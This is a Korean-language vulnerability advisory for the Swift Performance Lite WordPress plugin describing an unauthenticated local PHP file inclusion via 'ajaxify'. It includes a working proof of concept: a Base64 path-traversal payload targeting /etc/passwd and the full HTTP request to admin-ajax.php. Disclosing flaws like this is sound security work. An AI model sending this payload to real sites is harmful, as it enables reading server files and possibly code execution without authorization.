
Swift Performance Lite <= 2.3.7.1 - 'ajaxify'를 통한 인증되지 않은 로컬 PHP 파일 포함
Swift Performance Lite <= 2.3.7.1 - 인증되지 않은 로컬 PHP 파일 포함 via 'ajaxify'
Swift Performance Lite 워드프레스 플러그인은 2.3.7.1 버전까지(포함) 'ajaxify' 함수를 통해 로컬 PHP 파일 포함 취약점에 노출됩니다. 이로 인해 인증되지 않은 공격자가 서버에서 임의의 파일을 포함 및 실행할 수 있으며, 해당 파일의 PHP 코드를 실행할 수 있습니다. 이는 접근 제어를 우회하고, 민감한 데이터를 획득하거나, 이미지 및 기타 "안전한" 파일 유형을 업로드하여 포함할 수 있는 경우 코드 실행을 달성하는 데 사용될 수 있습니다.
Base64 페이로드 = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==